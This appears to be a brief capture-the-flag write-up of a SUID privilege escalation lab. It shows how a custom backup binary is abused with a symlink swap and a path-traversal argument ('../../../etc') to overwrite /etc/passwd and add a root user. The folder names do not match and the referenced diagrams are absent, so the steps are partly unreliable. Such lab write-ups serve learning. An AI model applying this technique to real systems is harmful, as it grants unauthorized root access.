SUID bit Privilege Escalation Challenge
This is really interesting one.
We have to work with symlinks here.
The command to create a symlink:
ln -s <path> <symlink_name>
Using this command I got a suspicious file.
find / -perm -u=s -type f 2>/dev/null
/usr/local/bin/backup
This is not an ordinary file.
In the folder of this file a found its cpp script.
While reading this script we can find that the file takes a user and creates its backup.
There was string like this: Copydir("/home/" + user, "/backups/" + user")
We can specify the user in the args of the program like this:
backup <user>
.
Obviously, we can put any payload in the user argument. And what we want to do is to add new root user to the /etc/passwd
by overwriting it.
I created the next scheme for better understanding.
And one more:
now we have create a simple folder in the student's directory and the name is going to be blalink
and make a backup.
mkdir blalink
/usr/local/bin/backup student
Now we have to delete the folder that we just created and make the symlink using the scheme that I attached above with the same name.
Don't forget to copy the passwd file and modify it.
Now, let's to the backup again.
backup student/bla_link/../../../etc
and here we go.